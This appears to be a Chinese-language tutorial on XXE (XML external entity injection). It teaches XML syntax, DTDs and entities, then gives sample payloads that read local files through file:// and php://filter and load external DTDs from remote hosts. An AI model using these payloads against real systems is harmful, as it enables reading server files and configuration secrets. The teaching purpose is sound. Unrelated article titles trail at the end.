1、XXE漏洞概念
XXE(XML External Entity Injection) 又称为XML外部实体注入。
XML是一种类似于HTML(超文本标记语言)的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
2、XML基础知识
2.1、XML基础
(1)什么是 XML?
-
XML 指可扩展标记语言(EXtensible Markup Language)。
-
XML 是一种很像HTML的标记语言。
-
XML 的设计宗旨是传输数据,而不是显示数据。
- html显示数据
-
XML 标签没有被预定义。您需要自行定义标签。
-
XML 被设计为具有自我描述性。
-
XML 是 W3C 的推荐标准
(2)XML的作用
- 存储数据
- 传输数据
(3)基础语法
<?xml version="1.0" encoding="UTF-8"?>
<note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body>
</note>
文档结构图:
(4)语法规则:
-
XML 文档必须有根元素
-
XML 声明(可选)
-
所有的 XML 元素都必须有一个关闭标签
-
XML 标签对大小写敏感
-
XML 必须正确嵌套
-
XML 属性值必须加引号
-
实体引用(同html)
>,<
-
XML 中的注释(同html)
-
在 XML 中,空格会被保留
(5)XML 命名规则:
XML 元素必须遵循以下命名规则:
- 名称可以包含字母、数字以及其他的字符
- 名称不能以数字或者标点符号开始
- 名称不能以字母 xml(或者 XML、Xml 等等)开始
- 名称不能包含空格
2.2、XML的合法性
拥有正确语法的 XML 被称为"形式良好"的 XML。
通过 DTD 验证的XML是"合法"的 XML。
接下来掌握DTD(Document Type Definition)相关知识,有利于我们掌握XXE。
DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。
(1)内部DTD
假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中:
<!DOCTYPE root-element [element-declarations]>
- root-element:根元素
- element-declarations:元素声明
如:
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)> //!ELEMENT:用于定义元素的名字
<!ELEMENT from (#PCDATA)> //#PCDATA ANY
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>程咬金</to>
<from>貂蝉</from>
<heading>通知</heading>
<body>今天晚上,大战三百回合!</body>
</note>
以上 DTD 解释如下:
- !DOCTYPE note (第二行)定义此文档是 note 类型的文档。
- !ELEMENT note (第三行)定义 note 元素有四个元素:“to、from、heading,、body”
- !ELEMENT to (第四行)定义 to 元素为 “#PCDATA” 类型
- !ELEMENT from (第五行)定义 from 元素为 “#PCDATA” 类型
- !ELEMENT heading (第六行)定义 heading 元素为 “#PCDATA” 类型
- !ELEMENT body (第七行)定义 body 元素为 “#PCDATA” 类型
这里解释一下PCDATA和CDATA
PCDATA:是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。
CDATA:是不会被解析器解析的文本。
(2)外部DTD
假如 DTD 位于 XML 源文件的外部,那么它应通过下面的语法被封装在一个 DOCTYPE 定义中:
<!DOCTYPE root-element SYSTEM "filename">
- 这里的SYSTEM,就算造成整个漏洞的核心
先声明一个note.dtd:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
再写xml:
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE note SYSTEM "note.dtd">
<note><to>周瑜</to><from>黄盖</from><heading>提示</heading><body>老子不服输</body>
</note>
(3)DTD实体
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
- 实体引用是对实体的引用。
- 实体可在内部或外部进行声明。
<!ENTITY entity-name "entity-value">
示例:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE stu [<!-- 元素声明 --><!ELEMENT stu (name, age, address)><!ELEMENT name (#PCDATA)><!ELEMENT age (#PCDATA)><!ELEMENT address (#PCDATA)><!-- 实体声明 --><!ENTITY name "亚瑟"><!ENTITY age "18"><!ENTITY address "对抗路">]>
<stu><name>&name;</name><age>&age;</age><address>&address;</address>
</stu>
注意: 一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (😉。
浏览器效果:
简单一点的案例:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE stu [<!ENTITY name "亚瑟">]>
<name>&name;</name>
浏览器效果:
(4)外部实体
和内部实体一致,只是DTD声明在外部。
语法:
<!ENTITY entity-name SYSTEM "URI/URL">
xml中引用外部dtd实体:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[
<!ENTITY name SYSTEM "file:///D:/www/xxe/data.txt">]>
<root><username>&name;</username>
</root>
注意:这个地方直接浏览器访问拿不到数据,需要程序读取。
data.txt中随意什么内容都可以。
核心在于SYSTEM关键字。
SYSTEM这个地方常用的协议:
file:///path/to/file.exthttp://url/file.extphp://filter/read=convert.base64-encode/resource=conf.php
支持的协议:
其余的参考:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///c://test/1.txt" >]>
<value>&xxe;</value>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://xxx.com/xxxx.php" >]>
<value>&xxe;</value>
(4)参数实体
语法:
<!ENTITY % 实体名称 "实体的值">或者<!ENTITY % 实体名称 SYSTEM "URI">
注意: % 和 实体名字之间有一个空格
示例:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [
<!ENTITY % name SYSTEM "http://localhost/xxe/test2.php">
%name; <!--加载外部实体-->
]>
注意:参数实体只能在 DTD文件中被引用,其他实体在XML文档内引用。
参数实体 在DOCTYPE内 ,其他实体在DOCTYPE外
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [
<!ENTITY % name SYSTEM "http://192.168.13.1/xxe/test.dtd">
%name;<!--加载外部实体-->
]>
<root><username>&name;</username>
</root>
jdk api之FilterInputStream基础、应用、实战)
第2版 例4-7 datalist)
 MySQL数据库分库分表方案)
)
